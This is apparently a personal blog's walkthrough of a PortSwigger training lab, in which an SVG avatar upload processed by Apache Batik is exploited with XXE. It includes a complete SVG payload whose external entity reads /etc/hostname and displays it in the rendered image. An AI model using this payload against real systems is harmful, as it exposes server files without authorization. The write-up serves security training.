Lab: Exploiting XXE via image file upload

Posted on 2023-04-27 | Post modified | In Security/Practice/Portswigger Web Security Academy/XXE |

Lab: Exploiting XXE via image file upload

tags: `Portswigger Web Security Academy` `Web`

Description: This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.
Goal: To solve the lab, upload an image that displays the contents of the /etc/hostname file after processing. Then use the “Submit solution” button to submit the value of the server hostname.

Recon

In this lab, we can upload an exploited file which contained malicious xml data. Then we can fetch some sensitive information.

Exp - Upload Exploited File as Avatar

Create an exploit text file We can create a text file contained the payload below The exploited payload in .svg files:

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns ="http://www.w3.org/2000/svg" xmlns:xlink ="http://www.w3.org/1999/xlink" version="1.1"><text fontsize="16" x="0" y="16">&xxe;</text></svg>

Transfer to svg file and upload it After transfering to .svg file, we can choose arbitrary post and leave a comment below
Check your avatar Then you get back to post page and verified your avatar photo should contain a string which is your flag(sensitive data) that you must submit. :::spoiler Success Screenshot :::

Post author: SBK6401
Post link: https://bernie6401.github.io/security/practice/portswigger%20web%20security%20academy/xxe/2023/04/27/Lab_-Exploiting-XXE-via-image-file-upload/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.